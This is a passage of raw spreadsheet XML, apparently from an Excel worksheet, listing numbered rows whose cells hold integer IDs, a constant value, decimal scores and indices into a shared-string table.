        <v>12615</v>
      </c>
      <c r="H6378" t="s">
        <v>12616</v>
      </c>
    </row>
    <row r="6379" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6379" s="1">
        <v>6377</v>
      </c>
      <c r="B6379">
        <v>4586</v>
      </c>
      <c r="C6379">
        <v>4586</v>
      </c>
      <c r="D6379">
        <v>3</v>
      </c>
      <c r="E6379">
        <v>0.45719999074935908</v>
      </c>
      <c r="F6379" t="s">
        <v>10120</v>
      </c>
      <c r="G6379" t="s">
        <v>12617</v>
      </c>
      <c r="H6379" t="s">
        <v>12618</v>
      </c>
    </row>
    <row r="6380" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6380" s="1">
        <v>6378</v>
      </c>
      <c r="B6380">
        <v>4590</v>
      </c>
      <c r="C6380">
        <v>4590</v>
      </c>
      <c r="D6380">
        <v>3</v>
      </c>
      <c r="E6380">
        <v>0.51249998807907104</v>
      </c>
      <c r="F6380" t="s">
        <v>10120</v>
      </c>
      <c r="G6380" t="s">
        <v>12619</v>
      </c>
      <c r="H6380" t="s">
        <v>12620</v>
      </c>
    </row>
    <row r="6381" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6381" s="1">
        <v>6379</v>
      </c>
      <c r="B6381">
        <v>369</v>
      </c>
      <c r="C6381">
        <v>369</v>
      </c>
      <c r="D6381">
        <v>3</v>
      </c>
      <c r="E6381">
        <v>0.48429998755455023</v>
      </c>
      <c r="F6381" t="s">
        <v>10120</v>
      </c>
      <c r="G6381" t="s">
        <v>12621</v>
      </c>
      <c r="H6381" t="s">
        <v>12622</v>
      </c>
    </row>
    <row r="6382" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6382" s="1">
        <v>6380</v>
      </c>
      <c r="B6382">
        <v>4569</v>
      </c>
      <c r="C6382">
        <v>4569</v>
      </c>
      <c r="D6382">
        <v>3</v>
      </c>
      <c r="E6382">
        <v>0.92580002546310425</v>
      </c>
      <c r="F6382" t="s">
        <v>10120</v>
      </c>
      <c r="G6382" t="s">
        <v>12623</v>
      </c>
      <c r="H6382" t="s">
        <v>12624</v>
      </c>
    </row>
    <row r="6383" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6383" s="1">
        <v>6381</v>
      </c>
      <c r="B6383">
        <v>5311</v>
      </c>
      <c r="C6383">
        <v>5311</v>
      </c>
      <c r="D6383">
        <v>3</v>
      </c>
      <c r="E6383">
        <v>0.7937999963760376</v>
      </c>
      <c r="F6383" t="s">
        <v>10120</v>
      </c>
      <c r="G6383" t="s">
        <v>12625</v>
      </c>
      <c r="H6383" t="s">
        <v>12626</v>
      </c>
    </row>
    <row r="6384" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6384" s="1">
        <v>6382</v>
      </c>
      <c r="B6384">
        <v>80</v>
      </c>
      <c r="C6384">
        <v>80</v>
      </c>
      <c r="D6384">
        <v>3</v>
      </c>
      <c r="E6384">
        <v>0.55419999361038208</v>
      </c>
      <c r="F6384" t="s">
        <v>10120</v>
      </c>
      <c r="G6384" t="s">
        <v>12627</v>
      </c>
      <c r="H6384" t="s">
        <v>12628</v>
      </c>
    </row>
    <row r="6385" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6385" s="1">
        <v>6383</v>
      </c>
      <c r="B6385">
        <v>4559</v>
      </c>
      <c r="C6385">
        <v>4559</v>
      </c>
      <c r="D6385">
        <v>3</v>
      </c>
      <c r="E6385">
        <v>0.49660000205039978</v>
      </c>
      <c r="F6385" t="s">
        <v>10120</v>
      </c>
      <c r="G6385" t="s">
        <v>12629</v>
      </c>
      <c r="H6385" t="s">
        <v>12630</v>
      </c>
    </row>
    <row r="6386" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6386" s="1">
        <v>6384</v>
      </c>
      <c r="B6386">
        <v>68</v>
      </c>
      <c r="C6386">
        <v>68</v>
      </c>
      <c r="D6386">
        <v>3</v>
      </c>
      <c r="E6386">
        <v>0.99479997158050537</v>
      </c>
      <c r="F6386" t="s">
        <v>10120</v>
      </c>
      <c r="G6386" t="s">
        <v>12631</v>
      </c>
      <c r="H6386" t="s">
        <v>12632</v>
      </c>
    </row>
    <row r="6387" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6387" s="1">
        <v>6385</v>
      </c>
      <c r="B6387">
        <v>398</v>
      </c>
      <c r="C6387">
        <v>398</v>
      </c>
      <c r="D6387">
        <v>3</v>
      </c>
      <c r="E6387">
        <v>0.54890000820159912</v>
      </c>
      <c r="F6387" t="s">
        <v>10120</v>
      </c>
      <c r="G6387" t="s">
        <v>12633</v>
      </c>
      <c r="H6387" t="s">
        <v>12634</v>
      </c>
    </row>
    <row r="6388" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6388" s="1">
        <v>6386</v>
      </c>
      <c r="B6388">
        <v>5385</v>
      </c>
      <c r="C6388">
        <v>5385</v>
      </c>
      <c r="D6388">
        <v>3</v>
      </c>
      <c r="E6388">
        <v>0.9804999828338623</v>
      </c>
      <c r="F6388" t="s">
        <v>10120</v>
      </c>
      <c r="G6388" t="s">
        <v>12635</v>
      </c>
      <c r="H6388" t="s">
        <v>12636</v>
      </c>
    </row>
    <row r="6389" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6389" s="1">
        <v>6387</v>
      </c>
      <c r="B6389">
        <v>5384</v>
      </c>
      <c r="C6389">
        <v>5384</v>
      </c>
      <c r="D6389">
        <v>3</v>
      </c>
      <c r="E6389">
        <v>0.99570000171661377</v>
      </c>
      <c r="F6389" t="s">
        <v>10120</v>
      </c>
      <c r="G6389" t="s">
        <v>12637</v>
      </c>
      <c r="H6389" t="s">
        <v>12638</v>
      </c>
    </row>
    <row r="6390" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6390" s="1">
        <v>6388</v>
      </c>
      <c r="B6390">
        <v>395</v>
      </c>
      <c r="C6390">
        <v>395</v>
      </c>
      <c r="D6390">
        <v>3</v>
      </c>
      <c r="E6390">
        <v>0.58370000123977661</v>
      </c>
      <c r="F6390" t="s">
        <v>10120</v>
      </c>
      <c r="G6390" t="s">
        <v>12639</v>
      </c>
      <c r="H6390" t="s">
        <v>12640</v>
      </c>
    </row>
    <row r="6391" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6391" s="1">
        <v>6389</v>
      </c>
      <c r="B6391">
        <v>4538</v>
      </c>
      <c r="C6391">
        <v>4538</v>
      </c>
      <c r="D6391">
        <v>3</v>
      </c>
      <c r="E6391">
        <v>0.78159999847412109</v>
      </c>
      <c r="F6391" t="s">
        <v>10120</v>
      </c>
      <c r="G6391" t="s">
        <v>12641</v>
      </c>
      <c r="H6391" t="s">
        <v>12592</v>
      </c>
    </row>
    <row r="6392" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6392" s="1">
        <v>6390</v>
      </c>
      <c r="B6392">
        <v>69</v>
      </c>
      <c r="C6392">
        <v>69</v>
      </c>
      <c r="D6392">
        <v>3</v>
      </c>
      <c r="E6392">
        <v>0.82620000839233398</v>
      </c>
      <c r="F6392" t="s">
        <v>10120</v>
      </c>
      <c r="G6392" t="s">
        <v>12642</v>
      </c>
      <c r="H6392" t="s">
        <v>12643</v>
      </c>
    </row>
    <row r="6393" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6393" s="1">
        <v>6391</v>
      </c>
      <c r="B6393">
        <v>382</v>
      </c>
      <c r="C6393">
        <v>382</v>
      </c>
      <c r="D6393">
        <v>3</v>
      </c>
      <c r="E6393">
        <v>0.87330001592636108</v>
      </c>
      <c r="F6393" t="s">
        <v>10120</v>
      </c>
      <c r="G6393" t="s">
        <v>12644</v>
      </c>
      <c r="H6393" t="s">
        <v>12645</v>
      </c>
    </row>
    <row r="6394" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6394" s="1">
        <v>6392</v>
      </c>
      <c r="B6394">
        <v>4541</v>
      </c>
      <c r="C6394">
        <v>4541</v>
      </c>
      <c r="D6394">
        <v>3</v>
      </c>
      <c r="E6394">
        <v>0.52619999647140503</v>
      </c>
      <c r="F6394" t="s">
        <v>10120</v>
      </c>
      <c r="G6394" t="s">
        <v>12646</v>
      </c>
      <c r="H6394" t="s">
        <v>12647</v>
      </c>
    </row>
    <row r="6395" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6395" s="1">
        <v>6393</v>
      </c>
      <c r="B6395">
        <v>4544</v>
      </c>
      <c r="C6395">
        <v>4544</v>
      </c>
      <c r="D6395">
        <v>3</v>
      </c>
      <c r="E6395">
        <v>0.78250002861022949</v>
      </c>
      <c r="F6395" t="s">
        <v>10120</v>
      </c>
      <c r="G6395" t="s">
        <v>12648</v>
      </c>
      <c r="H6395" t="s">
        <v>12649</v>
      </c>
    </row>
    <row r="6396" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6396" s="1">
        <v>6394</v>
      </c>
      <c r="B6396">
        <v>4545</v>
      </c>
      <c r="C6396">
        <v>4545</v>
      </c>
      <c r="D6396">
        <v>3</v>
      </c>
      <c r="E6396">
        <v>0.60039997100830078</v>
      </c>
      <c r="F6396" t="s">
        <v>10120</v>
      </c>
      <c r="G6396" t="s">
        <v>12650</v>
      </c>
      <c r="H6396" t="s">
        <v>12651</v>
      </c>
    </row>
    <row r="6397" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6397" s="1">
        <v>6395</v>
      </c>
      <c r="B6397">
        <v>4547</v>
      </c>
      <c r="C6397">
        <v>4547</v>
      </c>
      <c r="D6397">
        <v>3</v>
      </c>
      <c r="E6397">
        <v>0.54900002479553223</v>
      </c>
      <c r="F6397" t="s">
        <v>10120</v>
      </c>
      <c r="G6397" t="s">
        <v>12652</v>
      </c>
      <c r="H6397" t="s">
        <v>12653</v>
      </c>
    </row>
    <row r="6398" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6398" s="1">
        <v>6396</v>
      </c>
      <c r="B6398">
        <v>381</v>
      </c>
      <c r="C6398">
        <v>381</v>
      </c>
      <c r="D6398">
        <v>3</v>
      </c>
      <c r="E6398">
        <v>0.99010002613067627</v>
      </c>
      <c r="F6398" t="s">
        <v>10120</v>
      </c>
      <c r="G6398" t="s">
        <v>12654</v>
      </c>
      <c r="H6398" t="s">
        <v>12655</v>
      </c>
    </row>
    <row r="6399" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6399" s="1">
        <v>6397</v>
      </c>
      <c r="B6399">
        <v>4558</v>
      </c>
      <c r="C6399">
        <v>4558</v>
      </c>
      <c r="D6399">
        <v>3</v>
      </c>
      <c r="E6399">
        <v>0.48679998517036438</v>
      </c>
      <c r="F6399" t="s">
        <v>10120</v>
      </c>
      <c r="G6399" t="s">
        <v>12656</v>
      </c>
      <c r="H6399" t="s">
        <v>12657</v>
      </c>
    </row>
    <row r="6400" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6400" s="1">
        <v>6398</v>
      </c>
      <c r="B6400">
        <v>5382</v>
      </c>
      <c r="C6400">
        <v>5382</v>
      </c>
      <c r="D6400">
        <v>3</v>
      </c>
      <c r="E6400">
        <v>0.8464999794960022</v>
      </c>
      <c r="F6400" t="s">
        <v>10120</v>
      </c>
      <c r="G6400" t="s">
        <v>12658</v>
      </c>
      <c r="H6400" t="s">
        <v>12659</v>
      </c>
    </row>
    <row r="6401" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6401" s="1">
        <v>6399</v>
      </c>
      <c r="B6401">
        <v>4560</v>
      </c>
      <c r="C6401">
        <v>4560</v>
      </c>
      <c r="D6401">
        <v>3</v>
      </c>
      <c r="E6401">
        <v>0.99599999189376831</v>
      </c>
      <c r="F6401" t="s">
        <v>10120</v>
      </c>
      <c r="G6401" t="s">
        <v>12660</v>
      </c>
      <c r="H6401" t="s">
        <v>12661</v>
      </c>
    </row>
    <row r="6402" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6402" s="1">
        <v>6400</v>
      </c>
      <c r="B6402">
        <v>302</v>
      </c>
      <c r="C6402">
        <v>302</v>
      </c>
      <c r="D6402">
        <v>3</v>
      </c>
      <c r="E6402">
        <v>0.67580002546310425</v>
      </c>
      <c r="F6402" t="s">
        <v>10120</v>
      </c>
      <c r="G6402" t="s">
        <v>12662</v>
      </c>
      <c r="H6402" t="s">
        <v>12663</v>
      </c>
    </row>
    <row r="6403" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6403" s="1">
        <v>6401</v>
      </c>
      <c r="B6403">
        <v>4820</v>
      </c>
      <c r="C6403">
        <v>4820</v>
      </c>
      <c r="D6403">
        <v>3</v>
      </c>
      <c r="E6403">
        <v>0.58630001544952393</v>
      </c>
      <c r="F6403" t="s">
        <v>10120</v>
      </c>
      <c r="G6403" t="s">
        <v>12664</v>
      </c>
      <c r="H6403" t="s">
        <v>12665</v>
      </c>
    </row>
    <row r="6404" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6404" s="1">
        <v>6402</v>
      </c>
      <c r="B6404">
        <v>5308</v>
      </c>
      <c r="C6404">
        <v>5308</v>
      </c>
      <c r="D6404">
        <v>3</v>
      </c>
      <c r="E6404">
        <v>0.85860002040863037</v>
      </c>
      <c r="F6404" t="s">
        <v>10120</v>
      </c>
      <c r="G6404" t="s">
        <v>12666</v>
      </c>
      <c r="H6404" t="s">
        <v>12667</v>
      </c>
    </row>
    <row r="6405" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6405" s="1">
        <v>6403</v>
      </c>
      <c r="B6405">
        <v>230</v>
      </c>
      <c r="C6405">
        <v>230</v>
      </c>
      <c r="D6405">
        <v>3</v>
      </c>
      <c r="E6405">
        <v>0.6689000129699707</v>
      </c>
      <c r="F6405" t="s">
        <v>10120</v>
      </c>
      <c r="G6405" t="s">
        <v>12668</v>
      </c>
      <c r="H6405" t="s">
        <v>12669</v>
      </c>
    </row>
    <row r="6406" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6406" s="1">
        <v>6404</v>
      </c>
      <c r="B6406">
        <v>166</v>
      </c>
      <c r="C6406">
        <v>166</v>
      </c>
      <c r="D6406">
        <v>3</v>
      </c>
      <c r="E6406">
        <v>0.4221000075340271</v>
      </c>
      <c r="F6406" t="s">
        <v>10120</v>
      </c>
      <c r="G6406" t="s">
        <v>12670</v>
      </c>
      <c r="H6406" t="s">
        <v>12671</v>
      </c>
    </row>
    <row r="6407" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6407" s="1">
        <v>6405</v>
      </c>
      <c r="B6407">
        <v>5017</v>
      </c>
      <c r="C6407">
        <v>5017</v>
      </c>
      <c r="D6407">
        <v>3</v>
      </c>
      <c r="E6407">
        <v>0.52670001983642578</v>
      </c>
      <c r="F6407" t="s">
        <v>10120</v>
      </c>
      <c r="G6407" t="s">
        <v>12672</v>
      </c>
      <c r="H6407" t="s">
        <v>12673</v>
      </c>
    </row>
    <row r="6408" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6408" s="1">
        <v>6406</v>
      </c>
      <c r="B6408">
        <v>218</v>
      </c>
      <c r="C6408">
        <v>218</v>
      </c>
      <c r="D6408">
        <v>3</v>
      </c>
      <c r="E6408">
        <v>0.51980000734329224</v>
      </c>
      <c r="F6408" t="s">
        <v>10120</v>
      </c>
      <c r="G6408" t="s">
        <v>12674</v>
      </c>
      <c r="H6408" t="s">
        <v>12675</v>
      </c>
    </row>
    <row r="6409" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6409" s="1">
        <v>6407</v>
      </c>
      <c r="B6409">
        <v>213</v>
      </c>
      <c r="C6409">
        <v>213</v>
      </c>
      <c r="D6409">
        <v>3</v>
      </c>
      <c r="E6409">
        <v>0.73799997568130493</v>
      </c>
      <c r="F6409" t="s">
        <v>10120</v>
      </c>
      <c r="G6409" t="s">
        <v>12676</v>
      </c>
      <c r="H6409" t="s">
        <v>12677</v>
      </c>
    </row>
    <row r="6410" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6410" s="1">
        <v>6408</v>
      </c>
      <c r="B6410">
        <v>212</v>
      </c>
      <c r="C6410">
        <v>212</v>
      </c>
      <c r="D6410">
        <v>3</v>
      </c>
      <c r="E6410">
        <v>0.98659998178482056</v>
      </c>
      <c r="F6410" t="s">
        <v>10120</v>
      </c>
      <c r="G6410" t="s">
        <v>12678</v>
      </c>
      <c r="H6410" t="s">
        <v>12679</v>
      </c>
    </row>
    <row r="6411" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6411" s="1">
        <v>6409</v>
      </c>
      <c r="B6411">
        <v>5004</v>
      </c>
      <c r="C6411">
        <v>5004</v>
      </c>
      <c r="D6411">
        <v>3</v>
      </c>
      <c r="E6411">
        <v>0.53689998388290405</v>
      </c>
      <c r="F6411" t="s">
        <v>10120</v>
      </c>
      <c r="G6411" t="s">
        <v>12680</v>
      </c>
      <c r="H6411" t="s">
        <v>12681</v>
      </c>
    </row>
    <row r="6412" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6412" s="1">
        <v>6410</v>
      </c>
      <c r="B6412">
        <v>167</v>
      </c>
      <c r="C6412">
        <v>167</v>
      </c>
      <c r="D6412">
        <v>3</v>
      </c>
      <c r="E6412">
        <v>0.54820001125335693</v>
      </c>
      <c r="F6412" t="s">
        <v>10120</v>
      </c>
      <c r="G6412" t="s">
        <v>12682</v>
      </c>
      <c r="H6412" t="s">
        <v>12683</v>
      </c>
    </row>
    <row r="6413" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6413" s="1">
        <v>6411</v>
      </c>
      <c r="B6413">
        <v>5063</v>
      </c>
      <c r="C6413">
        <v>5063</v>
      </c>
      <c r="D6413">
        <v>3</v>
      </c>
      <c r="E6413">
        <v>0.6492999792098999</v>
      </c>
      <c r="F6413" t="s">
        <v>10120</v>
      </c>
      <c r="G6413" t="s">
        <v>12684</v>
      </c>
      <c r="H6413" t="s">
        <v>12685</v>
      </c>
    </row>
    <row r="6414" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6414" s="1">
        <v>6412</v>
      </c>
      <c r="B6414">
        <v>5064</v>
      </c>
      <c r="C6414">
        <v>5064</v>
      </c>
      <c r="D6414">
        <v>3</v>
      </c>
      <c r="E6414">
        <v>0.57760000228881836</v>
      </c>
      <c r="F6414" t="s">
        <v>10120</v>
      </c>
      <c r="G6414" t="s">
        <v>12686</v>
      </c>
      <c r="H6414" t="s">
        <v>12687</v>
      </c>
    </row>
    <row r="6415" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6415" s="1">
        <v>6413</v>
      </c>
      <c r="B6415">
        <v>5070</v>
      </c>
      <c r="C6415">
        <v>5070</v>
      </c>
      <c r="D6415">
        <v>3</v>
      </c>
      <c r="E6415">
        <v>0.61269998550415039</v>
      </c>
      <c r="F6415" t="s">
        <v>10120</v>
      </c>
      <c r="G6415" t="s">
        <v>12688</v>
      </c>
      <c r="H6415" t="s">
        <v>12689</v>
      </c>
    </row>
    <row r="6416" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6416" s="1">
        <v>6414</v>
      </c>
      <c r="B6416">
        <v>5072</v>
      </c>
      <c r="C6416">
        <v>5072</v>
      </c>
      <c r="D6416">
        <v>3</v>
      </c>
      <c r="E6416">
        <v>0.64579999446868896</v>
      </c>
      <c r="F6416" t="s">
        <v>10120</v>
      </c>
      <c r="G6416" t="s">
        <v>12690</v>
      </c>
      <c r="H6416" t="s">
        <v>12691</v>
      </c>
    </row>
    <row r="6417" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6417" s="1">
        <v>6415</v>
      </c>
      <c r="B6417">
        <v>5073</v>
      </c>
      <c r="C6417">
        <v>5073</v>
      </c>
      <c r="D6417">
        <v>3</v>
      </c>
      <c r="E6417">
        <v>0.53200000524520874</v>
      </c>
      <c r="F6417" t="s">
        <v>10120</v>
      </c>
      <c r="G6417" t="s">
        <v>12692</v>
      </c>
      <c r="H6417" t="s">
        <v>12693</v>
      </c>
    </row>
    <row r="6418" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6418" s="1">
        <v>6416</v>
      </c>
      <c r="B6418">
        <v>5074</v>
      </c>
      <c r="C6418">
        <v>5074</v>
      </c>
      <c r="D6418">
        <v>3</v>
      </c>
      <c r="E6418">
        <v>0.48730000853538508</v>
      </c>
      <c r="F6418" t="s">
        <v>10120</v>
      </c>
      <c r="G6418" t="s">
        <v>12694</v>
      </c>
      <c r="H6418" t="s">
        <v>12695</v>
      </c>
    </row>
    <row r="6419" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6419" s="1">
        <v>6417</v>
      </c>
      <c r="B6419">
        <v>171</v>
      </c>
      <c r="C6419">
        <v>171</v>
      </c>
      <c r="D6419">
        <v>3</v>
      </c>
      <c r="E6419">
        <v>0.8069000244140625</v>
      </c>
      <c r="F6419" t="s">
        <v>10120</v>
      </c>
      <c r="G6419" t="s">
        <v>12696</v>
      </c>
      <c r="H6419" t="s">
        <v>12697</v>
      </c>
    </row>
    <row r="6420" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6420" s="1">
        <v>6418</v>
      </c>
      <c r="B6420">
        <v>4999</v>
      </c>
      <c r="C6420">
        <v>4999</v>
      </c>
      <c r="D6420">
        <v>3</v>
      </c>
      <c r="E6420">
        <v>0.95349997282028198</v>
      </c>
      <c r="F6420" t="s">
        <v>10120</v>
      </c>
      <c r="G6420" t="s">
        <v>12698</v>
      </c>
      <c r="H6420" t="s">
        <v>12699</v>
      </c>
    </row>
    <row r="6421" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6421" s="1">
        <v>6419</v>
      </c>
      <c r="B6421">
        <v>4998</v>
      </c>
      <c r="C6421">
        <v>4998</v>
      </c>
      <c r="D6421">
        <v>3</v>
      </c>
      <c r="E6421">
        <v>0.69999998807907104</v>
      </c>
      <c r="F6421" t="s">
        <v>10120</v>
      </c>
      <c r="G6421" t="s">
        <v>12700</v>
      </c>
      <c r="H6421" t="s">
        <v>12701</v>
      </c>
    </row>
    <row r="6422" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6422" s="1">
        <v>6420</v>
      </c>
      <c r="B6422">
        <v>4995</v>
      </c>
      <c r="C6422">
        <v>4995</v>
      </c>
      <c r="D6422">
        <v>3</v>
      </c>
      <c r="E6422">
        <v>0.65210002660751343</v>
      </c>
      <c r="F6422" t="s">
        <v>10120</v>
      </c>
      <c r="G6422" t="s">
        <v>12702</v>
      </c>
      <c r="H6422" t="s">
        <v>12703</v>
      </c>
    </row>
    <row r="6423" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6423" s="1">
        <v>6421</v>
      </c>
      <c r="B6423">
        <v>4958</v>
      </c>
      <c r="C6423">
        <v>4958</v>
      </c>
      <c r="D6423">
        <v>3</v>
      </c>
      <c r="E6423">
        <v>0.55529999732971191</v>
      </c>
      <c r="F6423" t="s">
        <v>10120</v>
      </c>
      <c r="G6423" t="s">
        <v>12704</v>
      </c>
      <c r="H6423" t="s">
        <v>12705</v>
      </c>
    </row>
    <row r="6424" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6424" s="1">
        <v>6422</v>
      </c>
      <c r="B6424">
        <v>4967</v>
      </c>
      <c r="C6424">
        <v>4967</v>
      </c>
      <c r="D6424">
        <v>3</v>
      </c>
      <c r="E6424">
        <v>0.98949998617172241</v>
      </c>
      <c r="F6424" t="s">
        <v>10120</v>
      </c>
      <c r="G6424" t="s">
        <v>12706</v>
      </c>
      <c r="H6424" t="s">
        <v>12707</v>
      </c>
    </row>
    <row r="6425" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6425" s="1">
        <v>6423</v>
      </c>
      <c r="B6425">
        <v>5194</v>
      </c>
      <c r="C6425">
        <v>5194</v>
      </c>
      <c r="D6425">
        <v>3</v>
      </c>
      <c r="E6425">
        <v>0.99610000848770142</v>
      </c>
      <c r="F6425" t="s">
        <v>10120</v>
      </c>
      <c r="G6425" t="s">
        <v>12708</v>
      </c>
      <c r="H6425" t="s">
        <v>12709</v>
      </c>
    </row>
    <row r="6426" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6426" s="1">
        <v>6424</v>
      </c>
      <c r="B6426">
        <v>155</v>
      </c>
      <c r="C6426">
        <v>155</v>
      </c>
      <c r="D6426">
        <v>3</v>
      </c>
      <c r="E6426">
        <v>0.53339999914169312</v>
      </c>
      <c r="F6426" t="s">
        <v>10120</v>
      </c>
      <c r="G6426" t="s">
        <v>12710</v>
      </c>
      <c r="H6426" t="s">
        <v>12711</v>
      </c>
    </row>
    <row r="6427" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6427" s="1">
        <v>6425</v>
      </c>
      <c r="B6427">
        <v>244</v>
      </c>
      <c r="C6427">
        <v>244</v>
      </c>
      <c r="D6427">
        <v>3</v>
      </c>
      <c r="E6427">
        <v>0.74210000038146973</v>
      </c>
      <c r="F6427" t="s">
        <v>10120</v>
      </c>
      <c r="G6427" t="s">
        <v>12712</v>
      </c>
      <c r="H6427" t="s">
        <v>12713</v>
      </c>
    </row>
    <row r="6428" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6428" s="1">
        <v>6426</v>
      </c>
      <c r="B6428">
        <v>4976</v>
      </c>
      <c r="C6428">
        <v>4976</v>
      </c>
      <c r="D6428">
        <v>3</v>
      </c>
      <c r="E6428">
        <v>0.70850002765655518</v>
      </c>
      <c r="F6428" t="s">
        <v>10120</v>
      </c>
      <c r="G6428" t="s">
        <v>12714</v>
      </c>
      <c r="H6428" t="s">
        <v>12715</v>
      </c>
    </row>
    <row r="6429" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6429" s="1">
        <v>6427</v>
      </c>
      <c r="B6429">
        <v>240</v>
      </c>
      <c r="C6429">
        <v>240</v>
      </c>
      <c r="D6429">
        <v>3</v>
      </c>
      <c r="E6429">
        <v>0.56269997358322144</v>
      </c>
      <c r="F6429" t="s">
        <v>10120</v>
      </c>
      <c r="G6429" t="s">
        <v>12716</v>
      </c>
      <c r="H6429" t="s">
        <v>12717</v>
      </c>
    </row>
    <row r="6430" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6430" s="1">
        <v>6428</v>
      </c>
      <c r="B6430">
        <v>4986</v>
      </c>
      <c r="C6430">
        <v>4986</v>
      </c>
      <c r="D6430">
        <v>3</v>
      </c>
      <c r="E6430">
        <v>0.64209997653961182</v>
      </c>
      <c r="F6430" t="s">
        <v>10120</v>
      </c>
      <c r="G6430" t="s">
        <v>12718</v>
      </c>
      <c r="H6430" t="s">
        <v>12719</v>
      </c>
    </row>
    <row r="6431" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6431" s="1">
        <v>6429</v>
      </c>
      <c r="B6431">
        <v>5189</v>
      </c>
      <c r="C6431">
        <v>5189</v>
      </c>
      <c r="D6431">
        <v>3</v>
      </c>
      <c r="E6431">
        <v>0.95029997825622559</v>
      </c>
      <c r="F6431" t="s">
        <v>10120</v>
      </c>
      <c r="G6431" t="s">
        <v>12720</v>
      </c>
      <c r="H6431" t="s">
        <v>12721</v>
      </c>
    </row>
    <row r="6432" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6432" s="1">
        <v>6430</v>
      </c>
      <c r="B6432">
        <v>162</v>
      </c>
      <c r="C6432">
        <v>162</v>
      </c>
      <c r="D6432">
        <v>3</v>
      </c>
      <c r="E6432">
        <v>0.52340000867843628</v>
      </c>
      <c r="F6432" t="s">
        <v>10120</v>
      </c>
      <c r="G6432" t="s">
        <v>12722</v>
      </c>
      <c r="H6432" t="s">
        <v>12723</v>
      </c>
    </row>
    <row r="6433" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6433" s="1">
        <v>6431</v>
      </c>
      <c r="B6433">
        <v>5186</v>
      </c>
      <c r="C6433">
        <v>5186</v>
      </c>
      <c r="D6433">
        <v>3</v>
      </c>
      <c r="E6433">
        <v>0.99800002574920654</v>
      </c>
      <c r="F6433" t="s">
        <v>10120</v>
      </c>
      <c r="G6433" t="s">
        <v>12724</v>
      </c>
      <c r="H6433" t="s">
        <v>10623</v>
      </c>
    </row>
    <row r="6434" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6434" s="1">
        <v>6432</v>
      </c>
      <c r="B6434">
        <v>5185</v>
      </c>
      <c r="C6434">
        <v>5185</v>
      </c>
      <c r="D6434">
        <v>3</v>
      </c>
      <c r="E6434">
        <v>0.72180002927780151</v>
      </c>
      <c r="F6434" t="s">
        <v>10120</v>
      </c>
      <c r="G6434" t="s">
        <v>12725</v>
      </c>
      <c r="H6434" t="s">
        <v>12726</v>
      </c>
    </row>
    <row r="6435" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6435" s="1">
        <v>6433</v>
      </c>
      <c r="B6435">
        <v>165</v>
      </c>
      <c r="C6435">
        <v>165</v>
      </c>
      <c r="D6435">
        <v>3</v>
      </c>
      <c r="E6435">
        <v>0.52990001440048218</v>
      </c>
      <c r="F6435" t="s">
        <v>10120</v>
      </c>
      <c r="G6435" t="s">
        <v>12727</v>
      </c>
      <c r="H6435" t="s">
        <v>12728</v>
      </c>
    </row>
    <row r="6436" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6436" s="1">
        <v>6434</v>
      </c>
      <c r="B6436">
        <v>233</v>
      </c>
      <c r="C6436">
        <v>233</v>
      </c>
      <c r="D6436">
        <v>3</v>
      </c>
      <c r="E6436">
        <v>0.98580002784729004</v>
      </c>
      <c r="F6436" t="s">
        <v>10120</v>
      </c>
      <c r="G6436" t="s">
        <v>12729</v>
      </c>
      <c r="H6436" t="s">
        <v>12730</v>
      </c>
    </row>
    <row r="6437" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6437" s="1">
        <v>6435</v>
      </c>
      <c r="B6437">
        <v>4993</v>
      </c>
